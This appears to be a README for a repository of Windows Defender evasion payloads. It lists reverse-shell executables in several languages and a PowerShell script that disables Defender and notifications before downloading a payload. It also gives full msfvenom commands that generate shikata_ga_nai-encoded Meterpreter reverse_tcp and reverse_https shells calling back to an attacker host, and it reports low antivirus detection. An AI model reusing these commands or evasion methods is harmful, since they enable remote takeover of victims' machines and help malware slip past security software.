Warning: Downloading items here will likely trigger alerts with your antivirus programs, do so in a controlled enviroment. Executing files here technically should post no harm since they only connet to a prive IP, again, do so in a controlled enviroment.
kib_keyboard.ps1 is a powershell script that disables windows defender and notifications, then downloads the actual payload.
kidx86.exeis a x86 tcp reverse shell writtern in c++ endcoded using shikata_ga_nai, with byte change, scrambled byes, extra dummy bytes and byte order obfuscation. 12/69 hits in VirusTotal (when it was first submitted). Able to bypass windows defender.kidx86_source.cppis the source file of the payload.shell.cis the raw payload from msfvenom. Generated bymsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -e x86/shikata_ga_nai -i 8 -f c > shell.cshell.exeis a generic tcp reverse shell. Xbkbx64.exeis a x64 tcp reverse shell encoded in a custom c++ payload. Xbkbx86.exeis a x86 tcp reverse shell encoded in a custom c++ payload. Xbkbpayload.llandbkbpayloadraw.csare XOR encoded tcp revershell written in a custom C# payload that uses a powershell file to download and execute in memory. (doesn't work)test1.exeis a tcp reverse shell encoded in custom python payload. Xtesting9.exeis a edited tcp reverse shell created using veil before changing from .bat to .exe. Xc_rtcp.exeis a tcp reverse shell written in C. Xcs_rtcp.exeis a tcp reverse shell written in C#. Xgo_rtcp.exeis a tcp reverse shell written in go. X
Generating HTTPS reverse shell msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.10 LPORT=443 HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -e x86/shikata_ga_nai -i 8 -f c > shell.c
A number of tools and lanaguages was used to the process of trying to bypass windows defender, including: Veil, metasploit windows defender evasion, complining custom payloads, we tried payloads encoded using python, c, c++, c#, ruby, go, java.